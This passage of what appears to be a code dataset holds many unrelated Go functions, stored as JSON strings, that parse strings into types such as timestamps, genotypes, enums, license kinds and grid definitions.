dependsOnContext, err = ParseDTimeTZ(ctx, s, TimeFamilyPrecisionToRoundDuration(t.Precision()))\n\tcase types.TimestampFamily:\n\t\td, dependsOnContext, err = ParseDTimestamp(ctx, s, TimeFamilyPrecisionToRoundDuration(t.Precision()))\n\tcase types.TimestampTZFamily:\n\t\td, dependsOnContext, err = ParseDTimestampTZ(ctx, s, TimeFamilyPrecisionToRoundDuration(t.Precision()))\n\tcase types.UuidFamily:\n\t\td, err = ParseDUuidFromString(s)\n\tcase types.EnumFamily:\n\t\td, err = MakeDEnumFromLogicalRepresentation(t, s)\n\tdefault:\n\t\treturn nil, false, errors.AssertionFailedf(\"unknown type %s (%T)\", t, t)\n\t}\n\treturn d, dependsOnContext, err\n}", "func (f *Feature) SingleGenotype(gen string, order map[string]uint64) (*Genotype, error) {\n\tif loc, ok := order[gen]; ok { //gen is a valid genotype\n\t\tif preParsed, ok := f.ParsedGenotypes[gen]; ok { //gen has already been accessed for this feature\n\t\t\treturn preParsed, nil\n\t\t} else { //gen needs to be extracted from the info field\n\t\t\tinfo := bytes.Split(f.Genotypes[loc], []byte{':'})\n\t\t\tif len(info) != len(f.Format) { //info is improperly formatted\n\t\t\t\treturn nil, errors.New(\"genotype has improperly formatted data\")\n\t\t\t} else {\n\t\t\t\tparsedGT := Genotype{PhasedGT: false}\n\t\t\t\tparsedGT.Id = gen\n\t\t\t\tparsedGT.Fields = make(map[string]string, len(f.Format))\n\t\t\t\tfor key, value := range f.Format {\n\t\t\t\t\tparsedGT.Fields[key] = string(info[value])\n\t\t\t\t\tif key == \"GT\" {\n\t\t\t\t\t\tgt := bytes.Split(info[value], []byte{'|'})\n\t\t\t\t\t\tif len(gt) > 1 {\n\t\t\t\t\t\t\tparsedGT.PhasedGT = true\n\t\t\t\t\t\t} else if len(gt) == 1 {\n\t\t\t\t\t\t\tgt = bytes.Split(info[value], []byte{'/'})\n\t\t\t\t\t\t}\n\n\t\t\t\t\t\tparsedGT.GT = make([]int, len(gt))\n\t\t\t\t\t\tfor i := range gt {\n\t\t\t\t\t\t\tif string(gt[i]) == \".\" {\n\t\t\t\t\t\t\t\tparsedGT.GT[i] = -1\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\tval, _ := strconv.Atoi(string(gt[i]))\n\t\t\t\t\t\t\t\tparsedGT.GT[i] = val\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tif len(f.ParsedGenotypes) == 0 {\n\t\t\t\t\tf.ParsedGenotypes = make(map[string]*Genotype)\n\t\t\t\t}\n\t\t\t\tf.ParsedGenotypes[gen] = &parsedGT\n\t\t\t\treturn &parsedGT, nil\n\t\t\t}\n\t\t}\n\t} else {\n\t\treturn nil, errors.New(\"genotype not in vcf\")\n\t}\n}", "func (me TxsdMovementType) IsGr() bool { return me.String() == \"GR\" }", "func (fOpenType FileOpenType) ParseString(\n valueString string,\n caseSensitive bool) (FileOpenType, error) {\n\n ePrefix := \"FileOpenType.ParseString() \"\n\n fOpenType.checkInitializeMaps(false)\n\n result := FileOpenType(0)\n\n lenValueStr := len(valueString)\n\n if strings.HasSuffix(valueString, \"()\") {\n valueString = valueString[0 : lenValueStr-2]\n lenValueStr -= 2\n }\n\n if lenValueStr < 3 {\n return result,\n fmt.Errorf(ePrefix+\n \"Input parameter 'valueString' is INVALID! valueString='%v' \", valueString)\n }\n\n var ok bool\n var idx int\n\n if caseSensitive {\n\n if !strings.HasPrefix(valueString, \"Type\") {\n valueString = \"Type\" + valueString\n }\n\n idx, ok = mFileOpenTypeStringToInt[valueString]\n\n if !ok {\n return FileOpenType(0),\n fmt.Errorf(ePrefix+\n \"'valueString' did NOT MATCH a FileOpenType. valueString='%v' \", valueString)\n }\n\n result = FileOpenType(idx)\n\n } else {\n\n valueString = strings.ToLower(valueString)\n\n if !strings.HasPrefix(valueString, \"type\") {\n valueString = \"type\" + valueString\n }\n\n idx, ok = mFileOpenTypeLwrCaseStringToInt[valueString]\n\n if !ok {\n return FileOpenType(0),\n fmt.Errorf(ePrefix+\n \"'valueString' did NOT MATCH a FileOpenType. valueString='%v' \", valueString)\n }\n\n result =\n FileOpenType(idx)\n }\n\n return result, nil\n}", "func MustParse(s string) float64 {\n\tv, err := Parse(s)\n\tif err != nil {\n\t\tlog.Fatalf(\"bad string %q: %v\", s, err)\n\t}\n\treturn v\n}", "func (t PostgresTyper) GetType(in string) string {\n\tif t.IsFloat(in) {\n\t\treturn \"decimal\"\n\t} else if t.IsInt(in) {\n\t\treturn \"int\"\n\t} else if t.IsBool(in) {\n\t\treturn \"bool\"\n\t} else {\n\t\treturn \"character varying\"\n\t}\n}", "func TypeofFormat(s string) Format {\n\tif f, ok := formatMap[strings.ToLower(s)]; ok {\n\t\treturn f\n\t}\n\treturn FormUnknown\n}", "func String(f string) Interface {\n\treturn &valueType{\n\t\tname: f,\n\t\tempty: \"\",\n\t\tget: func(g Getter) interface{} {\n\t\t\treturn g.GetString(f)\n\t\t},\n\t}\n}", "func (t Type) Parse(value string) (interface{}, error) {\n\tif len(value) == 0 {\n\t\treturn nil, nil\n\t}\n\tswitch t {\n\tcase STRING:\n\t\treturn value, nil\n\tcase BOOLEAN:\n\t\tif value == \"true\" {\n\t\t\treturn true, nil\n\t\t} else if value == \"false\" {\n\t\t\treturn false, nil\n\t\t} else {\n\t\t\treturn nil, errors.New(fmt.Sprint(\"not a boolean: \", value))\n\t\t}\n\tcase NUMBER:\n\t\tif r, ok := new(big.Rat).SetString(value); ok {\n\t\t\treturn r, nil\n\t\t} else {\n\t\t\treturn nil, errors.New(fmt.Sprint(\"not a number: \", value))\n\t\t}\n\tcase DATE:\n\t\tif d, err := time.ParseInLocation(FORMAT_DATE, value, LOCATION_DATE); err == nil {\n\t\t\treturn d, nil\n\t\t} else {\n\t\t\treturn nil, errors.New(fmt.Sprint(\"not a date: \", value))\n\t\t}\n\tcase TIME:\n\t\tif t, err := time.Parse(FORMAT_TIME, value); err == nil {\n\t\t\treturn time.Date(1, 1, 1, t.Hour(), t.Minute(), t.Second(), t.Nanosecond(), LOCATION_TIME), nil\n\t\t} else {\n\t\t\treturn nil, errors.New(fmt.Sprint(\"not a time: \", value))\n\t\t}\n\tcase DATETIME:\n\t\tif dt, err := time.Parse(FORMAT_DATETIME, value); err == nil {\n\t\t\treturn dt, nil\n\t\t} else {\n\t\t\treturn nil, errors.New(fmt.Sprint(\"not a datetime: \", value))\n\t\t}\n\t}\n\treturn nil, errors.New(fmt.Sprint(\"illegal value `\", value, \"` for type \", t.String()))\n}", "func (s *String) Type() ObjectType { return STRING_OBJ }", "func GAFromString(s string) GroupAddress {\n\tga := GroupAddress{Main: 0, Middle: 0, Sub: 0}\n\tif _, err := fmt.Sscanf(s, \"%d/%d/%d\", &ga.Main, &ga.Middle, &ga.Sub); err == nil {\n\t\treturn ga\n\t}\n\tlog.Printf(\"Error parsing GA: %s\", s)\n\treturn ga\n}", "func (t *VLStrStr) GoType() string {\n\treturn \"VLStrStr\"\n}", "func MustParse(value string) *Swift {\n\tswft, err := Parse(value)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn swft\n}", "func (c CanonType) MustParse(s string) Tag {\n\tt, err := c.Parse(s)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn t\n}", "func parseString(rawString string) (interface{}, error) {\n\tdefaultValue, err := parseDefault(rawString)\n\tif err == nil {\n\t\treturn defaultValue, nil\n\t} else {\n\t\treturn data.HollowString{Value: rawString}, nil\n\t}\n}", "func (_type *Type) UnmarshalGQL(val interface{}) error {\n\tstr, ok := val.(string)\n\tif !ok {\n\t\treturn fmt.Errorf(\"enum %T must be a string\", val)\n\t}\n\t*_type = Type(str)\n\tif err := TypeValidator(*_type); err != nil {\n\t\treturn fmt.Errorf(\"%s is not a valid Type\", str)\n\t}\n\treturn nil\n}", "func (_type *Type) UnmarshalGQL(val interface{}) error {\n\tstr, ok := val.(string)\n\tif !ok {\n\t\treturn fmt.Errorf(\"enum %T must be a string\", val)\n\t}\n\t*_type = Type(str)\n\tif err := TypeValidator(*_type); err != nil {\n\t\treturn fmt.Errorf(\"%s is not a valid Type\", str)\n\t}\n\treturn nil\n}", "func (s *Sampling) Parse(value string) error {\n\tswitch strings.ToLower(value) {\n\tcase \"disabled\":\n\t\t*s = Disabled\n\tcase \"testing\":\n\t\t*s = Testing\n\tcase \"production\":\n\t\t*s = Production\n\tdefault:\n\t\tf, err := strconv.ParseFloat(value, 64)\n\t\tif err != nil {\n\t\t\treturn instrumentationError(\"invalid Sampling value '%s': %v\", value, err)\n\t\t}\n\t\t*s = Sampling(f)\n\t}\n\treturn nil\n}", "func ParseBumpStrategyType(value string) BumpStrategyType {\n\tswitch strings.ToLower(value) {\n\tcase \"major\":\n\t\treturn MAJOR\n\tcase \"minor\":\n\t\treturn MINOR\n\tcase \"patch\":\n\t\treturn PATCH\n\tdefault:\n\t\treturn AUTO\n\t}\n}", "func StringToPledgeType(sType string) (PledgeType, error) {\n\tswitch strings.ToLower(sType) {\n\tcase \"network\", \"confidant\":\n\t\treturn Network, nil\n\tcase \"vote\":\n\t\treturn Vote, nil\n\tcase \"oracle\":\n\t\treturn Oracle, nil\n\tdefault:\n\t\treturn Invalid, fmt.Errorf(\"unsupport type: %s\", sType)\n\t}\n}", "func ReadGDEF(fp string, print bool) (*Definition, error) {\n\tfile, err := os.Open(fp)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"ReadGDEF: %v\", err)\n\t}\n\tdefer file.Close()\n\n\treader, a, l := bufio.NewReader(file), make([]string, 6), 0\n\tfor {\n\t\tline, _, err := reader.ReadLine()\n\t\tif err == io.EOF {\n\t\t\tbreak\n\t\t} else if err != nil {\n\t\t\treturn nil, fmt.Errorf(\"ReadTextLines: %v\", err)\n\t\t}\n\t\ta[l] = string(line)\n\t\tl++\n\t\tif l == 6 {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tparseHeader := func(a []string, print bool) (Definition, bool, error) {\n\t\tstErr, uni := make([]string, 0), false\n\t\terrfunc := func(v string, err error) {\n\t\t\tstErr = append(stErr, fmt.Sprintf(\" failed to read '%v': %v\", v, err))\n\t\t}\n\n\t\toe, err := strconv.ParseFloat(a[0], 64)\n\t\tif err != nil {\n\t\t\terrfunc(\"OE\", err)\n\t\t}\n\t\ton, err := strconv.ParseFloat(a[1], 64)\n\t\tif err != nil {\n\t\t\terrfunc(\"ON\", err)\n\t\t}\n\t\trot, err := strconv.ParseFloat(a[2], 64)\n\t\tif err != nil {\n\t\t\terrfunc(\"ROT\", err)\n\t\t}\n\t\tnr, err := strconv.ParseInt(a[3], 10, 32)\n\t\tif err != nil {\n\t\t\terrfunc(\"NR\", err)\n\t\t}\n\t\tnc, err := strconv.ParseInt(a[4], 10, 32)\n\t\tif err != nil {\n\t\t\terrfunc(\"NC\", err)\n\t\t}\n\t\tcs, err := strconv.ParseFloat(a[5], 64)\n\t\tif err != nil {\n\t\t\tif a[5][0] == 85 { // 85 = acsii code for 'U'\n\t\t\t\tuni = true\n\t\t\t} else {\n\t\t\t\terrfunc(\"CS\", err)\n\t\t\t}\n\t\t\tcs, err = strconv.ParseFloat(a[5][1:len(a[5])], 64)\n\t\t\tif err != nil {\n\t\t\t\terrfunc(\"CS\", err)\n\t\t\t}\n\t\t} else {\n\t\t\t// stErr = append(stErr, \" *** Fatal error: ReadGDEF.parseHeader: non-uniform grids currently not supported ***\")\n\t\t\tcs = -1.\n\t\t}\n\n\t\t// error handling\n\t\tif len(stErr) > 0 {\n\t\t\treturn Definition{}, uni, fmt.Errorf(\"fatal error(s): ReadGDEF.parseHeader:\\n%s\", strings.Join(stErr, \"\\n\"))\n\t\t}\n\n\t\tgd := Definition{Eorig: oe, Norig: on, Rotation: rot, Cwidth: cs, Nrow: int(nr), Ncol: int(nc)}\n\t\tif print {\n\t\t\tfmt.Printf(\"\\n opened %s\\n\", fp)\n\t\t\tfmt.Printf(\" xul\\t\\t%.1f\\n\", oe)\n\t\t\tfmt.Printf(\" yul\\t\\t%.1f\\n\", on)\n\t\t\tfmt.Printf(\" rotation\\t%f\\n\", rot)\n\t\t\tfmt.Printf(\" nrows\\t\\t%d\\n\", nr)\n\t\t\tfmt.Printf(\" ncols\\t\\t%d\\n\", nc)\n\t\t\tfmt.Printf(\" cell size\\t%.3f\\n\", cs)\n\t\t\tfmt.Printf(\" is uniform:\\t%t\\n\", uni)\n\t\t}\n\n\t\treturn gd, uni, nil\n\t}\n\tgd, isuniform, err := parseHeader(a, print)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif gd.Rotation != 0. {\n\t\treturn nil, fmt.Errorf(\"ReadGDEF error: rotation no yet supported\")\n\t}\n\tif !isuniform {\n\t\t// slst := make([]float64, gd.Nrow+gd.Ncol)\n\t\t// slst[0], _ = strconv.ParseFloat(a[5], 64)\n\t\t// for i := 1; i < gd.Nrow+gd.Ncol; i++ {\n\t\t// \tline, _, err := reader.ReadLine()\n\t\t// \tif err == io.EOF {\n\t\t// \t\treturn nil, fmt.Errorf(\"ReadTextLines (cell widths): %v\", err)\n\t\t// \t} else if err != nil {\n\t\t// \t\treturn nil, fmt.Errorf(\"ReadTextLines (cell widths): %v\", err)\n\t\t// \t}\n\t\t// \tslst[i], _ = strconv.ParseFloat(string(line), 64)\n\t\t// }\n\t\t// gd.VCwidth = slst\n\n\t\tgd.cwidths, gd.cheights = make([]float64, gd.Ncol), make([]float64, gd.Nrow)\n\t\tgd.cheights[0], _ = strconv.ParseFloat(a[5], 64)\n\t\tfor i := 1; i < gd.Nrow; i++ {\n\t\t\tline, _, err := reader.ReadLine()\n\t\t\tif err == io.EOF {\n\t\t\t\treturn nil, fmt.Errorf(\"ReadTextLines (cell widths): %v\", err)\n\t\t\t} else if err != nil {\n\t\t\t\treturn nil, fmt.Errorf(\"ReadTextLines (cell widths): %v\", err)\n\t\t\t}\n\t\t\tgd.cheights[i], _ = strconv.ParseFloat(string(line), 64)\n\t\t}\n\t\tfor j := 0; j < gd.Ncol; j++ {\n\t\t\tline, _, err := reader.ReadLine()\n\t\t\tif err == io.EOF {\n\t\t\t\treturn nil, fmt.Errorf(\"ReadTextLines (cell heights): %v\", err)\n\t\t\t} else if err != nil {\n\t\t\t\treturn nil, fmt.Errorf(\"ReadTextLines (cell heights): %v\", err)\n\t\t\t}\n\t\t\tgd.cwidths[j], _ = strconv.ParseFloat(string(line), 64)\n\t\t}\n\t}\n\n\tnc := gd.Nrow * gd.Ncol\n\tcn, cx := 0, nc\n\tif nc%8 != 0 {\n\t\tnc += 8 - nc%8 // add padding\n\t}\n\tnc /= 8\n\n\tb1 := make([]byte, nc)\n\tif err := binary.Read(reader, binary.LittleEndian, b1); err != nil { // no active cells\n\t\tif err != io.EOF {\n\t\t\treturn nil, fmt.Errorf(\"fatal error: read actives failed: %v\", err)\n\t\t}\n\t\tif print {\n\t\t\tfmt.Printf(\" (no active cells)\\n\")\n\t\t}\n\t\tgd.Sactives = make([]int, cx)\n\t\tgd.act = make(map[int]bool, cx)\n\t\tgd.Nact = cx\n\t\tfor i := 0; i < cx; i++ {\n\t\t\tgd.Sactives[i] = i\n\t\t\tgd.act[i] = true\n\t\t}\n\t\tgd.Coord = make(map[int]mmaths.Point, cx)\n\t\tcid := 0\n\t\tfor i := 0; i < gd.Nrow; i++ {\n\t\t\tfor j := 0; j < gd.Ncol; j++ {\n\t\t\t\tp := mmaths.Point{X: gd.Eorig + gd.Cwidth*(float64(j)+0.5), Y: gd.Norig - gd.Cwidth*(float64(i)+0.5)}\n\t\t\t\tgd.Coord[cid] = p\n\t\t\t\tcid++\n\t\t\t}\n\t\t}\n\t} else { // active cells\n\t\tt := make([]byte, 1)\n\t\tif v, _ := reader.Read(t); v != 0 {\n\t\t\treturn nil, fmt.Errorf(\"fatal error: EOF not reached when expected\")\n\t\t}\n\t\tgd.Sactives = []int{}\n\t\tgd.act = make(map[int]bool, cx)\n\t\tfor _, b := range b1 {\n\t\t\tfor i := uint(0); i < 8; i++ {\n\t\t\t\tif b&(1<<i)>>i == 1 {\n\t\t\t\t\tgd.Sactives = append(gd.Sactives, cn)\n\t\t\t\t\tgd.act[cn] = true\n\t\t\t\t\tgd.Nact++\n\t\t\t\t}\n\t\t\t\tcn++\n\t\t\t\tif cn >= cx {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tif cn != cx {\n\t\t\treturn nil, fmt.Errorf(\"fatal error(s): ReadGDEF:\\n number of cells found (%d) not equal to total (%d): %v\", cn, cx, err)\n\t\t}\n\t\tif gd.Nact > 0 && print {\n\t\t\tfmt.Printf(\" %s active cells\\n\", mmio.Thousands(int64(gd.Nact))) //11,118,568\n\t\t}\n\t\tgd.Coord = make(map[int]mmaths.Point, gd.Nact)\n\t\tcid := 0\n\t\tfor i := 0; i < gd.Nrow; i++ {\n\t\t\tfor j := 0; j < gd.Ncol; j++ {\n\t\t\t\tif _, ok := gd.act[cid]; ok {\n\t\t\t\t\tp := mmaths.Point{X: gd.Eorig + gd.Cwidth*(float64(j)+0.5), Y: gd.Norig - gd.Cwidth*(float64(i)+0.5)}\n\t\t\t\t\tgd.Coord[cid] = p\n\t\t\t\t}\n\t\t\t\tcid++\n\t\t\t}\n\t\t}\n\t}\n\tif print {\n\t\tfmt.Println()\n\t}\n\treturn &gd, nil\n}", "func ParseFloatDef(s string, def float64) float64 {\n\tif f, err := strconv.ParseFloat(s, 32); err == nil {\n\t\treturn f\n\t}\n\treturn def\n}", "func (t *VLStr) GoType() string {\n\treturn \"VLStr\"\n}", "func (sat *SignatureAlgoType) LoadString(str string) error {\n\tswitch str {\n\tcase SignatureAlgoEd25519Specifier.String():\n\t\t*sat = SignatureAlgoEd25519\n\tcase SignatureAlgoNilSpecifier.String():\n\t\t*sat = SignatureAlgoNil\n\tdefault:\n\t\treturn fmt.Errorf(\"unknown SignatureAlgoType string: %s\", str)\n\t}\n\treturn nil\n}", "func (t *TherapistType) FromString(s string) error {\n\tswitch s {\n\tcase \"unknown\":\n\t\t*t = UnknownTherapistType\n\tcase \"ergo\":\n\t\t*t = OccupationalTherapist\n\tcase \"physio\":\n\t\t*t = Physiotherapist\n\tcase \"logo\":\n\t\t*t = SpeechTherapist\n\tdefault:\n\t\treturn errors.New(\"unknown therapist type '\" + s + \"'\")\n\t}\n\treturn nil\n}", "func formatValue(s string) string {\n\tif KEYWORD(s).isValid() {\n\t\treturn s\n\t}\n\treturn fmt.Sprintf(\"'%s'\", s)\n}", "func (me TxsdFeDisplacementMapTypeXChannelSelector) IsG() bool { return me.String() == \"G\" }", "func (f flagString) Parse(value string) interface{} {\n\treturn value\n}", "func (req *PBSRequest) ParseGDPR() string {\n\tif req == nil || req.Regs == nil || len(req.Regs.Ext) == 0 {\n\t\treturn \"\"\n\t}\n\tval, err := jsonparser.GetInt(req.Regs.Ext, \"gdpr\")\n\tif err != nil {\n\t\treturn \"\"\n\t}\n\tgdpr := strconv.Itoa(int(val))\n\n\treturn gdpr\n}", "func (this *NowStr) Type() value.Type { return value.STRING }", "func (parser *Parser) parsePredefined(resolvedInput string, targetType reflect.Type) (interface{}, error) {\n\tvar result interface{}\n\tvar err error\n\tswitch targetType.Kind() {\n\tcase reflect.Bool:\n\t\tresult, err = strconv.ParseBool(resolvedInput)\n\tcase reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64:\n\t\tresult, err = strconv.ParseInt(resolvedInput, 0, targetType.Bits())\n\tcase reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64:\n\t\tresult, err = strconv.ParseUint(resolvedInput, 0, targetType.Bits())\n\tcase reflect.Float32, reflect.Float64:\n\t\tresult, err = strconv.ParseFloat(resolvedInput, targetType.Bits())\n\tcase reflect.String:\n\t\tresult, err = resolvedInput, nil\n\tdefault:\n\t\tresult, err = nil, errors.New(\"\")\n\t}\n\tif err == nil {\n\t\treturn reflect.ValueOf(result).Convert(targetType).Interface(), nil\n\t}\n\treturn nil, toErrorf(\"Could not convert '%v' to type '%v'\", resolvedInput, targetType.String())\n}", "func MustParse(str string) Quantity {\n\tq, err := ParseQuantity(str)\n\tif err != nil {\n\t\tpanic(fmt.Errorf(\"cannot parse '%v': %v\", str, err))\n\t}\n\treturn q\n}", "func DataTypeFromString(str string) DataType {\n\tif dataType, exist := StringToDataType[str]; exist {\n\t\treturn dataType\n\t}\n\treturn Unknown\n}", "func stringAutoType(ambiguous string) interface{} {\n\tif ambiguous == \"\" {\n\t\treturn nil\n\t}\n\tif parsedInt, err := strconv.ParseInt(ambiguous, 10, 64); err == nil {\n\t\treturn parsedInt\n\t}\n\tif parsedBool, err := strconv.ParseBool(ambiguous); err == nil {\n\t\treturn parsedBool\n\t}\n\treturn ambiguous\n}", "func ParseGender(name string) (Gender, error) {\n\tif x, ok := _GenderValue[name]; ok {\n\t\treturn x, nil\n\t}\n\treturn Gender(0), fmt.Errorf(\"%s is not a valid Gender\", name)\n}", "func (v *Variant) TypeString() string {\n\t// the string returned from this belongs to GVariant and must not be freed.\n\treturn C.GoString((*C.char)(C.g_variant_get_type_string(v.native())))\n}", "func parseTimeQuantum(v string) (TimeQuantum, error) {\n\tq := TimeQuantum(strings.ToUpper(v))\n\tif !q.Valid() {\n\t\treturn \"\", ErrInvalidTimeQuantum\n\t}\n\treturn q, nil\n}", "func ProposalStateFromStr(val string) ProposalStateType {\n\tswitch val {\n\tcase \"invalid\":\n\t\treturn InvalidState\n\tcase \"unvetted\":\n\t\treturn UnvettedState\n\tcase \"vetted\":\n\t\treturn VettedState\n\tdefault:\n\t\treturn UnknownState\n\t}\n}", "func (script *Script) Type(name string) (Type, bool) {\n\tgslangType, ok := script.types[name]\n\n\treturn gslangType, ok\n}", "func tryParse(s string, typ typeof.Type) (interface{}, bool) {\n\tswitch typ {\n\n\t// Happy Path, return the string\n\tcase typeof.String, typeof.JSON:\n\t\treturn s, true\n\n\t// Try and parse boolean value\n\tcase typeof.Bool:\n\t\tif v, err := strconv.ParseBool(s); err == nil {\n\t\t\treturn v, true\n\t\t}\n\n\t// Try and parse integer value\n\tcase typeof.Int32:\n\t\tif v, err := strconv.ParseInt(s, 10, 32); err == nil {\n\t\t\treturn int32(v), true\n\t\t}\n\n\t// Try and parse integer value\n\tcase typeof.Int64:\n\t\tif v, err := strconv.ParseInt(s, 10, 64); err == nil {\n\t\t\treturn v, true\n\t\t}\n\n\t// Try and parse float value\n\tcase typeof.Float64:\n\t\tif v, err := strconv.ParseFloat(s, 64); err == nil {\n\t\t\treturn v, true\n\t\t}\n\n\tcase typeof.Timestamp:\n\t\tif v, err := time.Parse(time.RFC3339, s); err == nil {\n\t\t\treturn v, true\n\t\t}\n\t}\n\n\treturn nil, false\n}", "func TypeOf(data []byte) Type {\n\tt := data[0]\n\n\t// FIXME: add additional validation\n\n\tswitch {\n\tdefault:\n\t\treturn invalid\n\tcase t == 'i':\n\t\treturn integer\n\tcase t >= '0' && t <= '9':\n\t\treturn str\n\tcase t == 'l':\n\t\treturn list\n\tcase t == 'd':\n\t\treturn dictionary\n\t}\n}", "func BoxTypeAv1C() gomp4.BoxType { return gomp4.StrToBoxType(\"av1C\") }", "func (l settableString) Type() string { return \"<string>\" }", "func DataTypeString(s string) (DataType, error) {\n\tif val, ok := _DataTypeNameToValueMap[s]; ok {\n\t\treturn val, nil\n\t}\n\treturn 0, fmt.Errorf(\"%s does not belong to DataType values\", s)\n}", "func StringToElementType(s string) ElementType {\n\tswitch s {\n\tcase \"PostSyn\":\n\t\treturn PostSyn\n\tcase \"PreSyn\":\n\t\treturn PreSyn\n\tcase \"Gap\":\n\t\treturn Gap\n\tcase \"Note\":\n\t\treturn Note\n\tdefault:\n\t\treturn UnknownElem\n\t}\n}", "func Parse(ctx context.Context, args ...core.Value) (core.Value, error) {\n\terr := core.ValidateArgs(args, 1, 1)\n\n\tif err != nil {\n\t\treturn values.None, err\n\t}\n\n\terr = core.ValidateType(args[0], core.StringType)\n\n\tif err != nil {\n\t\treturn values.None, err\n\t}\n\n\tdrv, err := drivers.StaticFrom(ctx)\n\n\tif err != nil {\n\t\treturn values.None, err\n\t}\n\n\tstr := args[0].(values.String)\n\n\treturn drv.ParseDocument(ctx, str)\n}", "func (l *License) GuessType() error {\n\tnewlineRegexp := regexp.MustCompile(\"(\\r\\n|\\n)\")\n\tspaceRegexp := regexp.MustCompile(\"\\\\s{2,}\")\n\n\t// Lower case everything to make comparison more adaptable\n\tcomp := strings.ToLower(l.Text)\n\n\t// Kill the newlines, since it is not clear if the provided license will\n\t// contain them or not, and either way it does not change the terms of the\n\t// license, so one is not \"more correct\" than the other. This just replaces\n\t// them with spaces. Also replace multiple spaces with a single space to\n\t// make comparison more simple.\n\tcomp = newlineRegexp.ReplaceAllLiteralString(comp, \" \")\n\tcomp = spaceRegexp.ReplaceAllLiteralString(comp, \" \")\n\n\tswitch {\n\tcase scan(comp, \"permission is hereby granted, free of charge, to any \"+\n\t\t\"person obtaining a copy of this software\"):\n\t\tl.Type = LicenseMIT\n\n\tcase scan(comp, \"permission to use, copy, modify, and/or distribute this \"+\n\t\t\"software for any\"):\n\t\tl.Type = LicenseISC\n\n\tcase scan(comp, \"apache license version 2.0, january 2004\") ||\n\t\tscan(comp, \"http://www.apache.org/licenses/license-2.0\"):\n\t\tl.Type = LicenseApache20\n\n\tcase scan(comp, \"gnu general public license version 2, june 1991\"):\n\t\tl.Type = LicenseGPL20\n\n\tcase scan(comp, \"gnu general public license version 3, 29 june 2007\"):\n\t\tl.Type = LicenseGPL30\n\n\tcase scan(comp, \"gnu lesser general public license version 2.1, \"+\n\t\t\"february 1999\"):\n\t\tl.Type = LicenseLGPL21\n\n\tcase scan(comp, \"gnu lesser general public license version 3, \"+\n\t\t\"29 june 2007\"):\n\t\tl.Type = LicenseLGPL30\n\n\tcase scan(comp, \"gnu affero general public license \"+\n\t\t\"version 3, 19 november 2007\"):\n\t\tl.Type = LicenseAGPL30\n\n\tcase scan(comp, \"mozilla public license\") && scan(comp, \"version 2.0\"):\n\t\tl.Type = LicenseMPL20\n\n\tcase scan(comp, \"redistribution and use in source and binary forms\"):\n\t\tswitch {\n\t\tcase scan(comp, \"neither the name of\"):\n\t\t\tl.Type = LicenseNewBSD\n\t\tdefault:\n\t\t\tl.Type = LicenseFreeBSD\n\t\t}\n\n\tcase scan(comp, \"common development and distribution license (cddl) \"+\n\t\t\"version 1.0\"):\n\t\tl.Type = LicenseCDDL10\n\n\tcase scan(comp, \"eclipse public license - v 1.0\"):\n\t\tl.Type = LicenseEPL10\n\n\tcase scan(comp, \"this is free and unencumbered software released into \"+\n\t\t\"the public domain\"):\n\t\tl.Type = LicenseUnlicense\n\n\tdefault:\n\t\treturn ErrUnrecognizedLicense\n\t}\n\n\treturn nil\n}", "func PureTypeEnumFromValue(value string) PureTypeEnum {\r\n switch value {\r\n case \"kStorageArray\":\r\n return PureType_KSTORAGEARRAY\r\n case \"kVolume\":\r\n return PureType_KVOLUME\r\n default:\r\n return PureType_KSTORAGEARRAY\r\n }\r\n}", "func (me TxsdMovementType) IsGa() bool { return me.String() == \"GA\" }", "func (t *VLIntStr) GoType() string {\n\treturn \"VLIntStr\"\n}", "func ParseFormat(s string) (Format, error) {\n\tswitch s {\n\tcase \"\", \"text\":\n\t\treturn FormatText, nil\n\tcase \"json\":\n\t\treturn FormatJSON, nil\n\tdefault:\n\t\treturn 0, fmt.Errorf(\"unknown format: %s\", s)\n\t}\n}", "func GetCompressionType(rawValue string) (CompressionType, error) {\n\tval := strings.TrimSpace(rawValue)\n\tif strings.ToUpper(val) == string(GZIP) {\n\t\treturn GZIP, nil\n\t}\n\treturn \"\", fmt.Errorf(\"Compression Type : %v is not yet supported\", val) //nolint:golint\n}", "func parseValue(s string) (float64, error) {\n\tcaps := valueRE.FindStringSubmatch(s)\n\tif len(caps) == 0 {\n\t\treturn 0, fmt.Errorf(\"Unparsable value: %s\", s)\n\t}\n\tv, err := strconv.ParseFloat(caps[1], 64)\n\tif err != nil {\n\t\treturn 0.0, errors.Wrapf(err, \"Error parsing value: %s\", s)\n\t}\n\n\tswitch u := caps[2]; u {\n\tcase \"\":\n\t\tfallthrough\n\tcase \"px\":\n\t\treturn v, nil\n\tcase \"in\":\n\t\treturn v * dpi, nil\n\tcase \"mm\":\n\t\treturn v * (dpi / mmPerInch), nil\n\tcase \"cm\":\n\t\treturn v * (mmPerCm * dpi / mmPerInch), nil\n\tcase \"pt\":\n\t\treturn v * (dpi / ptPerInch), nil\n\tcase \"pc\":\n\t\treturn v * (ptPerPc * dpi / ptPerInch), nil\n\tdefault:\n\t\treturn 0, fmt.Errorf(\"Unknown unit: %s\", u)\n\t}\n}", "func strToFloat(str string, typeAbbreviation string) float64 {\n\t// Remove space\n\tif strings.Contains(str, \" \") {\n\t\tstr = strings.ReplaceAll(str, \" \", \"\")\n\t}\n\tstr = strings.ReplaceAll(str, typeAbbreviation, \"\")\n\tf, err := strconv.ParseFloat(str, 10)\n\tif err != nil {\n\t\tErrorLog(\"cannot parse string to float: %s\", str)\n\t\treturn 0\n\t}\n\tInfoLogV1(\"strToFloat %f\", f)\n\treturn f\n}", "func GoFieldType(n *ecsgen.Node) string {\n\t// create a buffer to determine type\n\ttypeBuf := new(bytes.Buffer)\n\n\t// add array syntax if the field normalizes out to an array\n\tif n.IsArray() {\n\t\ttypeBuf.WriteString(\"[]\")\n\t}\n\n\t// if Node is an Object, we need to return this object's type. For example,\n\t// Node(\"client.nat\") needs to return \"ClientNAT\" as it's Go type.\n\tif n.IsObject() 